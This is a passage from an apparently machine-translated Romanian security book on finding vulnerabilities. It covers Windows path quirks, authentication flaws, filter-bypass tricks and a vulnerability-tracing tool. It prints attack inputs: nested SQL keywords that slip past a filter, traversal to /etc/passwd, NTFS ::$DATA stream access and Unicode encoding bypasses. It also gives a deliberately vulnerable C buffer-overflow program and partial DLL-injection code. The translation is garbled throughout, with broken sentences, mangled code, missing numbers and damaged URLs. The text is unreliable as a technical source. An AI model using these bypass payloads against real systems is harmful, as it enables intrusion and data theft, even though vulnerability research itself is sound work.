Fiecare simbol Vă rog picior bară oblică reprezintă tranziție la catalog Următorul nivel DIN puncte viziune programe Toata lumea listă spumos prevederi a determina gramatică nume fișiere La din pacate gramatică, realizat fişier funcții sala de operatie sisteme (astfel de Cum funcţie CreateFile interfata Win API), aprinde destul de putine notabil periculos structurilor Să facem o listă numai mic de statura din lor (listă nu sunt complet): despre Nume fişier poate sa începe Cu secvente Două verso tăieturi (\\) LA acest caz* primul componentă defineste gazdă, A al doilea — Nume Capitol paisprezece Instrumental analiză reţea resursă Interfață API fişier sisteme voi incerca conectați la reţea resursă pe date actual utilizator (care Mai a fi interceptat) despre Nume fişier la fel poate începe co special secvente personaje \\?\, care mijloace ce Nume fişier dat în format Unicode și poate depaseste comun restricții lungime, suprapus API fişier sisteme despre Nume fişier poate începe Cu secvente personaje \\?\UNC, ce la fel Oportunitati la Operațiune menționat anterior mecanism conexiuni Microsoft acțiune despre Nume fişier poate începe Cu secvente personaje \\ \FIZIC- CONDUCĂ Unde — index deschis fizic disc (început Cu ) La acest fizic disc se deschide pentru nivel scăzut acces despre Nume fişier poate începe Cu secvente personaje \\ \pipe\ LA acest caz se deschide numit canal despre Nume fişier poate conține colon (după scrisori disc), denotând alternativă curgere date în fişier sistem NTFS De fapt el considerată Cum separa fişier, dispărut în Mese directoare fişier curgere :$DATE rezervat pentru normal conţinut fişier despre LA calitate nume cataloage Mai fi indicat Două puncte ( ) și unu punct ( ) Primul reprezintă tranziție la părintească director, al doilea — actual catalog Exista destul de putine alții asa de la fel exotic excepții Moralitate: dacă nu ai grijă despre verificare intrare date, Mai apărea Probleme, deoarece ce baza interfata API Cu mare probabilitate unelte moduri muncă, care tu nu luat în considerare Prin urmare, Cu puncte viziune atacator va fi logic a intelege în aceste moduri și a încerca profită lor pentru ocolire de protecţie mecanisme proceduri verificări introdus date Printre real vulnerabilitati, condiţionat asemănătoare Probleme cheltuieli marcă defect Caractere Unicode în iis, defect dubla decodare iis, problemă CDONTS NewMail smtp, sintaxă PHP ip://nume fișier și mulți alte Dacă deja pe apoi plecat, apoi exact examinare intrare date este real motivul pe care revărsare aduce asa de mult dăuna Intrare date funcții interpretat în niste de bază context LA caz revărsare grămadă date, de ieșire pe frontieră tampon, interpretat Cum parte grămadă cadru, conținând date, adresa întoarcere, vptr, adrese procesoare excepții și t d Acea, ce în unu gramatică trebuie sa fi interpretat Cum sintactic proiecta (fraza), în un alt gramatică interpretat in caz contrar Aproape Toata lumea atacuri poate sa considera Cum încercări creare sintactic structuri, valabil în mai multe gramaticile Astfel de o abordare Are rând interesant consecințe în zone teorii informație și teorii codificare- Tipic arhitectural defecte l: dacă asigura absenta general structurilor între Două gramaticieni Poate, a reusi garanție imposibilitate atacuri, fondat pe transformări Două gramatician Idee interpretări contexte în general foarte util, mai ales dacă un obiect A iaki suporturi variat reţea protocoale — Cum server web, care trimite electronic Poștă sau transmite date servicii web Cu folosind greoaie format xml Probleme locuri dezechilibru La fel de regulă dezvoltatori înclinat aplica metode protecţie în toata lumea spec-ire moduri muncă, folosind astfel de trucuri, Cum examinare lungime, examinare format linii, alte soiuri verificări intrare date Încearcă-adică a scoate in evidenta loc dezechilibru și uite, în Cum include a lui specificul — aceasta este personal cale identificarea Probleme Poate a fi, unu din Antete HTTP sprijinit server web, e diferit pe lungime din restul titluri sau Server neobișnuit reactioneaza pe includere niste simbol în intrare date ȘI poate a fi, la apel recent realizat metoda web în Apache Schimbare mesaje despre greșeli Identificare locuri dezechilibru va ajuta dezvălui acestea locuri produs, care rezervat mai rea alții Probleme diferențe între autentificare și autorizare Autentificare numit proces verificări autenticitate subiect, și nimic Mai Mult LA proces autorizare determinat, permis dacă dat subiect acces la niste resursă LA mulți sisteme autentificare ținută foarte temeinic, A Aici autorizare pleacă pe al doilea plan Mai mult mai rea, când vizibil conexiune între aceste Două concepte dispare — dacă a reusi găsi alternativă cale la date, tu poti lor utilizare LA niste cazuri aceasta este Oportunitati la interesant cazuri extensii privilegii Cum a fost în exemplu Cu proces extproc în Oracol Alții exemple servi dsh|)ekt lotus Domino (www nextgenss com/adviso-ries/viewbypass txt), defect Oracol mod plsql Cu ocol autentificare (www nextgenss com/papers/hpoas pdf — cauta pe cuvinte autentificare prin trecere) și vulnerabilitate htaccess în Apache (www omnigroup com/mailman/archive/macosx-admin/ -june/ html) Similar Probleme întâlni în mulți aplicații web Deoarece protocol NTTR în principiu aparține la număr protocoale fără a sustine state, pentru conservare informație despre in stare autentificare (apoi mânca pentru conservare identificator sesiune) aplicat special mecanism Dacă atacator a reusi ghici sau duplicat identificator sesiune, el va fi capabil deplasați-vă seadia Ay gentificare Capitol paisprezece Incredibil analiză Probleme în cel mai evident locuri Dacă Căutare greșeli a mers în capat de drum, nu fie frică căutare în cel mai evident lună* max LA în special cauză imens cantități greșeli sunt prea mult lung nume dosare; Aici numai niste exemple: despre www netxtgenss com/advisories/sambar txt; despre http://otn oracle com/deploy/security/pdf/ Alert pdf; despre www nextgenss com/advisories/ora-unauthrm txt; despre www nextgenss com/advisories/webadmin altn txt; despre www nextgenss com/advisories/ora-isqlplus txt; despre www nextgenss com/advisories/steel-arrow-bo txt; despre http://cve mitre org/cgi-bin/cvename cgi?name=CAN- - ; despre www kb cert org/vuls/id/ LA general caz fază autentificare protocol este bun obiect pentru căutare revărsare și defecte format linii Cauză evident: dacă a reusi intercepta Control inainte de deținere autentificare, pentru pătrundere prin protecţie servere ne va fi necesar Nume utilizator și parola Pereche clasic defecte la distanta primind root-nrivilegin fără autentificare: defect Buna ziua, descoperit David Aitel (http://cve mitre org/, cgi-bin/cvename cgi?name=CAN- - ) și defecte SQL-UDP, descoperit David Lichfield (www nextgenss com/advisories/mssql-udp txt) Bypass proceduri verificări intrare date și detectare atacuri Bun a intelege în proceduri verificări intrare date și a fi capabil să lor ocolire — absolut necesar aptitudini pentru orice specialist în zone Securitate Următorul scurt listă va ajuta pentru tine a intelege, Unde de multe ori permis greșeli, A la fel a preda tu util tehnici ocolire proceduri verificări Îndepărtarea inacceptabil date încercând restrânge (sau descoperi) posibil atacuri, dezvoltatori de multe ori utilizare gresit regulat expresii Uzual o abordare bazat pe îndepărtare evident inacceptabil date, - de exemplu, pentru protecţie din atacuri SQL Injecţie poate sa a fost ar scrie filtru pentru îndepărtare rezervat cuvinte limba SQL, astfel de Cum SELECTAȚI, UNIUNE, UNDE, DIN și t d De exemplu: ' uniune Selectați tata, parola din sys utilizator$- Ega intrare linia după îndepărtare nerotitoare în Următorul: ' tata, parola sys usert- Bypass proceduri verificări intrare date și detectare atacuri merge mai departe eroare Dar uneori greşeală a reusi deplasați-vă recursiv inclus date: ' ununionon selectelect Nume, parola frefromom sys user$- Fiecare inacceptabil cuvânt se aprinde interior cel mai eu insumi La îndepărtare intern inacceptabil cuvinte extern cuvinte combina, și noi primim exact apoi, ce necesar Natural, astfel de decizie lucru numai în volum caz, dacă invalid date constau Cum minim din Două diferit personaje Utilizare alternativă codificări Cel mai evident cale ocolire proceduri verificări intrare date bazat pe utilizare alternativă codificări De exemplu, poate a se dovedi ce comportament server web sau aplicații web depinde din codificări date în forme bun exemplu servește specificatorul codificări Unicode %u în IIS Următorul Două desene considerată echivalent: despre www example com/%c %af; despre www example com/%ucOaf Un alt bun exemplu — tratament spatiu alb personaje Uneori se dovedește, ce Apendice interpretează în calitate caractere delimitare numai spatii, uitare despre simboluri file, întoarcere vagoane și traducere linii LA revărsare TZ OFFSET sisteme Oracol spaţiu conteaza semn completare specificatorul fus orar, A simbol file — Nu Noi a scris program pentru utilizare defect, dar la ne apărea Probleme Cu transfer parametrii echipă cost a inlocui Toata lumea spatii simboluri file, și Toata lumea câștigat amenda Mai mult unu clasic exemplu servește filtru API, care încercând restrânge acces la virtual catalog IIS pe bază niste verificări Acest filtru se aprinde la cerere la catalog /descărcări (www exemplu com/downloads/hot new file zip) Natural, primul o incercare deplasați-vă filtru va fi linia http //www exemplu com/Downloads/hot new file zlp Atentat, încercare se dovedește fără succes Încercând un alt opțiune: http //www exemplu com/^ downloads/hot new f e fermoar Pe acest o singura data filtru a reusi ocolire Atac primeste deplin acces la catalog descărcări fără orice autentificare Fişier operațiuni Cu toate că niste metode, depus în acest secțiune, raporta numai la ferestre, pe platforme Unix de obicei la fel a reusi găsi ceva asemănătoare Idee este în volum, la "trișa" Apendice și forta a lui: despre crede în apoi, ce necesar linia prezent în cale la fişier despre crede în apoi, ce invalid linia ns prezent în cale la fişier l la £ i lavă paisprezece instrumental analiză despre a executa neprevăzut Operațiune Cu fişier, dacă tratament dosar| bazat pe a lui extensie Prezenţă necesar linii în cale la fişier DIN primul şansă Toata lumea pur şi simplu LA cel mai situatii Unde poate sa cere Nume fişier, la fel poate sa cere Nume director Intr-o zi în proces analiză noi confruntat Cu situatia când scenariu aplicații web furnizate fișiere din dat permanent listă Pentru acest scenariu verificat ce în parametru cale fișier prezent unu din Următorul nume: despre data/foo xls despre data/bar xls despre data/wîbble xls; despre data/wobble xls Tipic Anchetă ar putea să arate ca Asa de: http //www exemplu com/getfile?file path=data/foo xls Dar Cum regulă când fişier sisteme se intalneste specificatorul cale la părintească director, ei nu Verifica, exista dacă Toata lumea specificat directoare din cauza acest ne a reușit deplasați-vă verificare la Ajutor cereri drăguț http //www exemplu com/getfile?file path=data/foo xls/ / / /etc/passwd Absența interzisă linii în cale la fişier DIN acest situatie caz acesta este cazul puțin mai dificil Presupune menționat anterior scenariu permite recurs la oricine fişier, dar interzice utilizare simboluri, denotând părintească catalog (/ /), A la fel acces la catalog Cu închis date Pentru acest scenariu controale, nu inclus dacă în parametru cale fișier linia date/private Protecţie gestionează cerere drăguț http //www example com/getfile?file path=data/ /private/conturi xls La fel de cunoscut specificatorul / / în context cale pi pe ce nu afectează Neprevăzut tratament fişier pe a lui expansiune Presupune administrator site-ul web M-am decis interzice Se încarcă electronic Mese Cu site-ul Pentru acest el M-am decis aplica filtru, interzicând orice valorile parametru calea fișierului, final subșir xls Atentat, încercare introduce Următorul Anchetă se dovedește fără succes: http //vmvj exemplu com/getfile file path=data/foo xls/ /private/conturi xls Apoi sa incercam introduce astfel de Anchetă: http //www exemplu com/getfile?file path=data/ /private/conturi xls Din nou eșec Printre interesant Caracteristici fişier sisteme NTFS în Windows NT poate sa a scoate in evidenta]" a sustine alternativă curge date interior fișiere Al- Bypass proceduri verificări intrare date și detectare aiak іgrantnvny curgere notat simbol colon (:) în Sfârşit Nume fişier, după pe cine ar trebui să Nume curgere Acest concept permite a primi acces la fişier Suficient introduce Următorul Anchetă, și date voi cu succes primit: hpr://www example com/getf e?f e path=data/ /pr vate/accounts xls::$DATE De/yu în volum, ce curgere date fişier "pe Mod implicit" numit ::$DATE Acea mânca solicitat acestea la fel cel mai date, dar în nou cerere Nume fişier nu se termină extensie xls, asa de Apendice permite Anchetă La asigurați-vă că în acest, do Următorul comanda pe calculator Cu NT (pentru volume NTFS): ecou foobar > foo txt Apoi do comanda Mai mult \MSSQLServer\CurrentVersion Natural, Următorul Etapa a devenit aderare mare cantități octeți la pachet Și într-adevăr, în SQL Server aflat banal NC reimplementare grămadă Pe acest etape a devenit evident, ce client ar trebui să Serios gândi despre blo| kirovka porturi UDP în retelelor Pe întregul analiză plecat nu Mai mult cinci minute și pară pa a continuat muncă La alții valorile primar octeți la fel observat interesant noid neagă Sens x LED la revărsare grămezi, când pe primar Cumpără volum urmat lung linia, colon și număr Sens x a forțând SQL Server Răspuns pachet, conținând singurul octet x a, — asa de modul în care a apărut posibilitate de fapt bloc acces la retelelor ikv mijloace falsificări adrese expeditor unu copii SQL Server și OT editare pachet Cu octet x a un alt copii SQL Server Rezultate Dacă aplica la social aspecte căutare vulnerabilitati, la defect, SQL- UDP a apărut unu înfricoşător particularitate — acea viteză, Cu care a fost descoperit revărsare grămadă Pe întregul analiză a luat niste cinci minute Evident, ce dacă noi ar putea găsi defect Asa de repede, apoi alte, Poate, Mai puțin responsabil oameni, la fel vor găsi a lui și profită lor pentru hacking sisteme informație despre greşeală a fost transferat în Microsoft pe comun canale și Cu acestea de cand și Microsoft, și al nostru grup insistent recomanda organizatii instalare "plasture" și bloc Port UDP (port folosit numai în volum caz, dacă client nu sigur în corect cale conexiuni la stabilit copii SQL Server) La din pacate mulți organizatii ns a tras Atenţie pe avertizare, și neted prin podea al anului după Ieșire "petice" niste (inainte de acum nici necunoscut) personalitate a scris și lansat vierme Slammer Vierme numit temeinic congestionare în Internet și adăugat bătaie de cap administratori mie organizatii Pe se faptă vierme Slammer ar putea ar aplica Mai mult Mai mult dăuna și foarte din pacate, ce oameni neglijare elementar protecţie Greu introduce, ce ar putea ar do specialişti în zone Securitate pentru prevenirea asemănătoare Probleme în viitorul În toate larg celebru cazuri - trânti, Cod roșu (pe baza defect ida Servere IIS descoperit unu din co-autori cărți Riley Hassen (Rilcy Hassel)), Nimda (acea la fel defect) și biaster (vierme pe baza defect RPC-DCOM, descoperit grup „Thc Ultimul Etape de Delir") — dezvoltatori temeinic a lucrat Cu producatori, la inainte de publicații date despre vulnerabilități trimis disponibil "petice" și exhaustiv informație despre protecţie Și subiecte nu Mai puțin în toata lumea din enumerate slu- jugi CHііgv unora ticălos a reușit cauză considerabil deteriora, crearea și alergare vierme, de operare defect Când merge mai departe ceva ca, Vreau să refuza din căutare defecte pro-ir immpogo dispoziţie, dar alternativă mult mai rea Analiștii nu crea /igfects, ei lor caut Companie Microsoft în an eliberată "petice" i nu ('noi Securitate, parte din care a fost destinat pentru remedieri mai multe erori Pe start al anului în toate sisteme Windows a existat peste o sută defecte, parte din care permis atacator complet urla sub Control un calculator Utilizatori linux nu cheltuieli crede, ce lor aceasta este nu preocupări De date me-i ibases ІСАТ în linux pe acea la fel perioadă a fost dezvăluit defecte bun exemple Probleme linux Mai servi defecte SSH și SSL în apache, i de asemenea defect fragmentar codificări (codificare în bucăți) Chiar dacă tu sunt utilizator Macintosh, aceasta este nu mijloace, ce tu poti nu convertit Atenţie nici pe sistem Windows Cu a ei virusuri și viermi nici pe sistem linux Cu defecte SSH și SSL și numeroase Probleme extensii privilegii Cantitate oameni, activ de-a face cu căutare defect pe platformă Mas și publicarea informație despre lor, în prezentul timp extrem putine; pe dacă nimeni nu caut defecte, aceasta este nu mijloace, ce lor Nu Sa traim — vom vedea Desigur, poate sa introduce tu pace, în care nimeni nu este logodit revelatoare defecte Securitate — apoi dacă pe legale motive apoi dacă din cauza lene in orice caz din acest periculos defecte nicăieri nu fugi Sunt voi aștepta iogo, OMS vrea lua Paşă calculatoare și retelelor sub A mea Control din cauza absenta informație nimeni nu va fi capabil numara pe protecţie din criminali guverne, terorişti și chiar concurenți Analiștii găsi defecte, dezvoltatori lor repara, și subiecte cel mai asigurat cu toate că ar niste grad protecţie LA entitate, Căutare vulnerabilități — aceasta este studiu programe, lucru pe ta calculator Cercetători nu crea defecte Acolo, Unde lor nu a fost; ei Total numai spectacol cât costă vulnerabil programe, care muncă în al nostru retelelor (și retelelor al nostru clienti) Vreau să speranţă, ce carte în plus ilumina acest subiect și va ajuta pentru tine a intelege în existent Probleme CAPITOL trasarea vulnerabilități Proces identificarea vulnerabilități poate a fi lung și în superior grad nud*i nym faptă Pentru economii timp și a ridica eficienţă poate sa razra* botat unelte, special proiectat pentru căutare defecte în vizate program pachete LA -l trebuie sa a intra programe și tehnologii, care ar permis a analiza original Codul aplicatii și compilate mașinărie Codul, A la fel fonduri analiză aplicatii pe etape execuţie LA ultimul categorie sunt incluse Cum tehnologii agresiv sunând (fuz, la care dedicat capitol ), Asa de și fonduri pasiv monitorizarea Fiecare instrument astfel de drăguț permite a analiza mecanisme protecţie aplicatii sub al lor colţ viziune Tehnologie toata lumea instrument are Cum virtuti, Asa de și neajunsuri Unirea niste tehnologie, noi Putem scapă de din neajunsuri, păstrarea puternic laturi În al doilea sfert al anului a început Loc de munca de mai sus proiect, numit uni niste tehnologii în unu analitic complex AJUN La fiecare tehnologii la utilizare separat din alții Sunt al lor limitări, de exemplu, analiză mașinărie cod extrem efectiv pentru căutare individual defecte, dar, la din pacate verifica posibilitate practic exploatare identificat defecte fără lucru programe extrem dificil După ce a construit sistem, in stare a analiza mașinărie Codul lucru aplicatii, noi Putem urmări proces performanţă, descoperind pe ce scenariu a reusi a ajunge potenţial vulnerabilități De fapt nou tehnologie se deschide posibilitate trasarea vulnerabilitati, de aici și a ei titlu Acest hibrid tehnologie aduce împreună analiză mașinărie cod, depanare, trasarea curge și suprascrierea imagini (imagine rcscriere) DIN a ei Ajutor a reușit și dezvălui niste deveni Bun celebru vulnerabilități P acum ea ia permanent loc în al nostru unelte LA acest capitol considerată Toata lumea Componente tehnologii trasarea vulnerabilități Material include pas cu pas Descriere proceselor proiecta și implementare simplu sisteme trasarea vulnerabilitati, furnizarea pasiv analiză aplicatii Cu scop căutare simplu vulnerabilități revărsare tampon vulnerabil program Sunt comune inteligenţă (modern tehnologii analiză (astfel de Cum analiză iniţială textele și analiză mașinărie cod) orientat pe muncă Cu aplicatii, stocate pe /iske Companii angajate în în curs de dezvoltare software dispoziţie, aceste ighpologie oferi mare Beneficii la identificarea potenţial vulnerabilități Sistem analiză iniţială textele și binar analiză poate dezvălui vulnerabilități "ascuns" adânc interior cod aplicatii, dar hopa extrem rar se dovedește în in stare Răspuns pe întrebare, nu împiedica dacă verificări sisteme Securitate posibilitate exploatare acest vulnerabilități De exemplu, analizand Apendice poate defini, sunt utilizate dacă în aplicarea nesigure funcții ca strcpy, dar la acest către el aproape desigur nu a reusi a sti, Cum exact verificat intrare date, transmise funcții strcpy, apoi mânca de fapt a sti, poate sa dacă pe practică exploata vulnerabilități funcții strcpy dezvoltatori, în care politică Securitate este pe bun nivel, lichida potenţial defecte în al lor aplicatii chiar apoi, când posibilitate lor exploatare nu dovedit La din pacate terț analiștilor suficient greu a convinge companie în nevoie lichidare potenţial vulnerabilități a ei produse La fel de regulă analiștilor trebuie sa dezvălui defect în produs și introduce formal proces sau program, la formă care management companiilor conștient necesitate remedieri defect De acest motiv de obicei cont pentru nu numai dezvălui vulnerabilitate în produs, dar și descrie scenariu, conducere la dat vulnerabilități interceptând Control în vulnerabil puncte programe, noi Va urmam pe lor folosind și salva necesar informație — astfel de Cum cale în programatic cod inainte de vulnerabil funcții LA rezultat analiză cod aplicatii noi a determina ce fel verificări efectuat Cu argumente transmise acest funcții vulnerabil program LA depus în acest secțiune exemplu demonstrat problemă revărsare tampon, caracteristică pentru mulți contemporan produse Programator sugerează ce funcţie LstrcpynA copii nu Mai mult octet (USERMAXSIZE- ) în adoptiv tampon La din pacate dezvoltator admis simplu greşeală gresit definire lungime, în rezultat în adoptiv tampon poate a fi copiat Mai mult date, Cum Trebuia sa Mulți dezvoltatori utilizare directivă defini pentru definiții lungime variat date De multe ori la acest în Apendice fara intentie sunt realizate serios vulnerabilități LA Următorul exemplu în funcții check username prezent vulnerabilitate revărsare tampon Maxim lungime copiat bloc, transferat lstrcpynA, se dovedește Mai mult lungime recepţioner tampon Deoarece variabil Capitol trasarea vulnerabilități tampon conţine Total şaisprezece octet, rămas şaisprezece octet sunt înregistrate pe Sfârşit tampon, înlocuind salvat valorile EURO și EIR în anterior cadru grămadă: /* vulnerabil program (vulp Cu)*/ #include #include #defini USERMAXSIZE #defini USERMAXLEN şaisprezece int check username(car *nume de utilizator) { char buffer[USERMAXLEN]; IstrcpynAtbuffer nume de utilizator USERMAXSIZE- ): /* Alte verificări nume de utilizator */ întoarcere (O) } int mendnt argc char **argv) { dacă (argc != ) fprintfistderr „Utilizare- %s \n” argv[ ]) ieșire (-l) } care LED) check username(argv[l]) SleepdOOO) } întoarcere (O) Mulți dezvoltatori utilizare în a lui muncă auxiliar fonduri ca Vizual asista Uneori în aceste mijloace dezvoltare implementate astfel de oportunități, Cum automat completare Probabil, în dat exemplu programator au inceput introduce USERMAXLEN, A miercuri dezvoltare sugerat către el şir USERMAXSIZE Programator M-am decis, ce către el a fost sugerat corect definiție, și presat cheie Tab Eu insumi A merge nu bănuind el creată serios vulnerabilitate în program intrus poate transfer către Mai mult octet în argument nume de utilizator; aceasta este va conduce la înlocuire date aplicatii în grămadă, și Cum consecinţă - la interceptare management La fel de a analiza program pa Disponibilitate astfel de vulnerabilitati? Dacă în aplicarea folosit incorporat preprocesor sau sistem analiză iniţială textele lucru Cu cod, deja trecut preprocesor prelucrare, apoi tehnologie analiză iniţială textele poate dezvălui defect Sistem analiză vulnerabil program mașinărie cod va merge pe un alt trasee: primul ea recunoaște fapt utilizare potenţial vulnerabil functii, A apoi comparaţie marimea recepţioner tampon și final admisibilă lungime, transferat funcții Dacă final lungime depaseste marimea recepţioner tampon, sistem analiză mașinărie cod informează despre potenţial vulnerabilități L ce, dacă adoptiv tampon este în bloc, dedicat în morman? Deoarece obiecte în morman creată numai în timp împlinire programe, definiție mărimea bloc extrem face dificilă hibrid sistem analiză iniţială textele și mașinărie cod poate a încerca a analiza Codul aplicatii, găsi comanda alocare bloc și comparaţie a ei poziţie Cu potenţial mutare execuţie The cale este recomandat decizie pentru majoritate dezvoltatori hibrid sisteme analiză La din pacate recomandat și realizat — departe nu unu și apoi la fel LA principiu problemă poate sa rezolva vizionare antet bloc în morman și ulterior ocol listă blocuri Mulți calculatoare la fel crea proprii grămezi Dacă noi vrei a analiza Apendice, construit beton calculator, Trebuie să include în sistem analiză a sustine corespunzător format grămezi A plati Atenţie pe utilizare funcții IstrcpynA, nu sosit în număr standard Funcții C timp execuţie Acest funcţie implementate în sistemică bibliotecă DLL din Microsoft și în afară de compoziţie argumente Are absolut alte semnătură Cum a ei mai departe relativ — funcţie strncpy Fiecare sala de operatie sistem creează proprii vilozități major Funcții C timp ionol yeni nya, în mare grad responsabil a ei specificul Tehnologii analiză iniţială textele și mașinărie cod extrem rar la curent pentru a sustine aceste terț functii" Acest problemă nu poate a fi direct rezolvat trasarea vulnerabilități Noi menționat despre a ei numai pentru A merge, la a scoate in evidenta) Mai mult unu circumstanţă, despre care de multe ori a uita dezvoltatori sisteme analiză Tehnologii protecţie software asigura la fel deveni serios obstacol pentru analiză static mașinărie cod În mulți scheme protecţie implicat criptare și/sau comprimare secțiuni cod, complicându-se a lui reconstrucţie Cu toate că biscuiti uşor ocolire protejat secțiuni, la utilizare automatizate tehnologii protecţie creează masa Probleme La din fericire majoritate scheme apărări s destinat pentru protecţie aplicatii, stocate pe disc După A merge Cum Apendice va fi descifrat, restaurat și încărcat în abordare spaţiu în, sistem protecţie practic elimină sia Funcții verso apel și indicatoare pe funcții de asemenea crea Probleme pentru analiză mașinărie cod Mulți din lor npitsnalpzprueyut numai în timp muncă aplicatii, A noi Poate sa urmă mutare împlinire programe numai pe circulaţie la variat puncte Intrare Absența initializat link-uri creează adiţional obstacole Asa de, noi considerată niste Probleme contemporan sisteme analiză La face față Cu lor, sa incercam proiecta proprii sistem trasarea Capitol trasarea vulnerabilități vulnerabilități LA mai departe ea va fi fi numit VulnTrace (reducere oi Vulnerabilitate urmărire, apoi mânca „urmărire vulnerabilități") Sistem va fi are| rând restricții de mai sus depășirea care Mai mult a fi muncește din greu Și Soare( la fel Vreau să crede, ce ea va deveni punct de start punct, care a trezi la înșelătorii corp interes la tehnologii trasarea vulnerabilități Principal Componente La fel de și în orice proiect, primul trebuie sa defini, din ce componente va fi; constau proiectat sistem Inainte de Total necesar de multe ori și pe oportunități direct abordare la ţintă aplicarea Asa de Cum ne o sa ai nevoie a citi conţinut memorie proces și transmite Control în al nostru Codul, sistem trebuie sa muncă în virtual vizate spaţiu ţintă aplicatii Pentru acest noi vom emite VulnTrace în formă biblioteci DLL și implementează se în ţintă proces Fiind interior vizate spaţiu ţintă aplicatii, VulnTrace va fi capabil urmări muncă aplicatii și uşor Schimbare modul a lui muncă La fel o sa ai nevoie posibilitate a analiza încărcat module pe articol potenţial vulnerabilitati, astfel de Cum anormal sau nesigure utilizare variat funcții Aceste funcții Mai fi importat Compune static sau fi realizat în formă substituit (inlinecl) functii, asa de pentru lor căutare o sa ai nevoie anumit grad analiză mașinărie cod Și Mai Mult Necesar posibilitate intercepta performanţă variat functii, la program VulnTrace ar putea explora lor argumente Pentru acest va fi folosit metodologie interceptare (agățare) apoi mânca substituiri funcții alții biblioteci DLL funcții al nostru biblioteci In cele din urma, colectate informație necesar oarecum cale transfer către analitice, asa de necesar implementează niste mecanism livrare LA al nostru exemplu va fi folosit sistem depanare mesaje sala de operatie sisteme ferestre; pentru transmitere mesaje suficient unu apel funcții API Pentru primind mesaje va fi folosit Microsoft De-toururi (cm Mai departe) — liber program, disponibil în Internet Asa de, sistem VulnTrace pe cel moment include din componente: despre implementare în abordare spaţiu proces; despre analiză mașinărie cod; despre interceptare funcții; despre Colectie și livrare date Acum noi detaliu considera structura și caracteristici toata lumea componenta, A după uni lor în program trasarea vulnerabilități Implementarea în abordare spaţiu proces Program VulnTrace trebuie sa redirecţiona ţintă program în a reușit regiune, în care analizate comportament vulnerabil funcții La fel Principal Componente o sa ai nevoie frecvent vedere state vizate spaţiu ţintă proces Toata lumea aceasta este poate sa a fost ar do în extern proces, dar apoi Trebuie să dezvolta special sistem pentru separare vizate spatii Două proceselor Exista mult Mai mult convenabil și de încredere decizie: introduce Codul în abordare spaţiu ţintă aplicatii Noi hai sa folosim pachet Ocoliri Cu site-ul Microsoft Cercetare (http://research microsoft com/sn/detours) Pact* G conţine mulți util funcții și exemple cod, permițând repede și uşor dezvolta sisteme trasarea ('nu este VulnTrace poate sa proiecta în formă DLL și Descarca în ţintă proces mijloace Ocoliri API Dacă tu vrei scrie proprii funcţie pentru descărcări biblioteci în abordare spaţiu ţintă proces, aceasta este se face iak: A scoate in evidenta pagină în proces la Ajutor funcții VirtualLallocEx Copie argumente necesar pentru apel funcții LoadLibrary apel funcţie LoadLibrary interior proces, folosind funcţie Creare-RemoteThread Cu indicând adrese argumente în vizate spaţiu proces Analiză mașinărie cod Ne o sa ai nevoie găsi fiecare copie fiecare trasabil funcții; ar trebui să tine minte, ce în mai multe module Mai exista diferit versiuni unu funcții Funcții, reprezentând pentru ne interes, introdus în abordare spaţiu proces pe unu din mai multe scheme static aspect Mulți compilatoare conține proprii versiuni standard funcții timp execuţie Dacă compilator descoperă fapt utilizare astfel de functii, el poate încorporare în ţintă Apendice proprii versiune funcții De exemplu, la în curs de dezvoltare programe, sfidător funcţie strncpy, Microsoft Vizual C++ conectează la aplicarea proprii versiune strncpy Cu aplicarea static aspect Mai departe este dată fragment asamblator cod simplu programe, în care funcţie principal cauze funcţie check username, după ce numit funcţie strncpy Asa de Cum funcţie strncpy disponibil pentru compilator în unu din biblioteci timp performanţă, ea a fost amenajat în aplicarea pe loc la fel pe funcţie principal Când funcţie check username cauze funcţie strncpy, Control vor fi transmise Drept în funcţie strncpy, situat pe virtual abordare x LA stânga coloană indicat virtual adrese functii, afișat pe dreapta check username B Apăsaţi mov sub Apăsaţi lea Apăsaţi ebp ebp esp special lOh OFh eax [tampon] dword ptr [nume de utilizator] Capitol trasarea vulnerabilități E Apăsaţi eax F caii strncpy ( ) adăuga esp OCh xor eax, eax părăsi A ret principal B Apăsaţi decalaj şir "Test" ( ) caii check username ( ) POP ecx jmp principal ( b) int int A int B int C int D int E int F int strncpy ' mov ecx, dword ptr [esp+OCh] Apăsaţi edi Test ecx, ecx je strncpy+ h ( b ) Apăsaţi esi А Apăsaţi ebx B mov ebx, ecx D mov esi, dword ptr [sp+ h] Test esi mov edi, dword ptr [sp+lOh] В jne strncpy+ h ( ) D shr ecx Dacă noi vrei intercepta static legat vulnerabil functii, Trebuie să crea Identificare semnătură (amprenta digitala) pentru fiecare astfel de funcții Acest semnătură va fi folosit pentru scanare cod toata lumea modul în vizate spaţiu și căutare static legat funcții Import În mulți săli de operație sisteme furnizate a sustine dinamic biblioteci — flexibil alternative biblioteci static Când dezvoltator utilizări în program functii, care evident trebuie sa exista în extern modul, compilator include în program relevante dependențe Pentru despre A merge în imagine programe sunt încorporate Mese import — structurilor date, analizate sistemică încărcător în timp descărcări Fiecare intrare Mese import seturi modul, care necesar Descarca Pentru toata lumea modul dat listă importate funcții În timp descărcări adresa fiecare funcții conservat în masa EU LA (Import Abordare masa), situat în import modul sau program Următorul program conţine unu funcţie check username, care utilizări importate funcţie LstrcpynA Când funcţie check username Principal componente ajunge comenzi apel pe virtual abordare x F, Control transmise în poziţie, stocate pe abordare x C Acest adresa corespunde înregistrări Mese EU LA al nostru vulnerabil programe și este punct Intrare funcții IstrcpynA Verifica nume de utilizator Apăsaţi ebp mov ebp, în special sub mai ales, loh Apăsaţi h lea eax,[buffer] V Apăsaţi dword ptr [nume de utilizator] E Apăsaţi eax F caii dword ptr [ imp lstrcpynA@ ( c)] xor eax, eax părăsi ret principal Apăsaţi decalaj şir "Test" ( ) E caii check username ( ) pop ecx jmp principal ( ) Mai departe este dată copie Mese EU LA paşă vulnerabil programe LA băutură prezent adresa, specificat în echipă apel interior funcții check username decalaj Intrare punct C C EFA D #include #include „ocoliri h" #defini DLLNAME „\\VulnTrace dll” int CDECL inject dll(DWORD nProcessId char *szDHPath) { MÂNER jeton; TOKEN PRIVILEGES tkp MÂNER hProc; if(OpenProcessToken( GetCurrentProcess() TOKEN-AJUST-PRIVILEGII | TOKEN QUERY &jeton) == FALS) { fprintf(stderr „OpenProcessToken A eșuat- Ohhshp " GetLastEr-ror()), întoarcere(- ), } i f(LookupPri vi egeValue( NUL, „SeDebugPrivilege” &tkp Privi eges[ ] Louis) == FALS) fprintf(stderr „LookupPrivilegeValue a eșuat* OhShp", GetLas-tErrorO), întoarcere(- ) tkp PrivilegeCount = , tkp Privi eges[ ] Atribute = SE PRIVILEGE ENABLED if(AdjustTokenPrivileges(token FALS &tkp NUL nul) == FALS) { fprintf(stderr 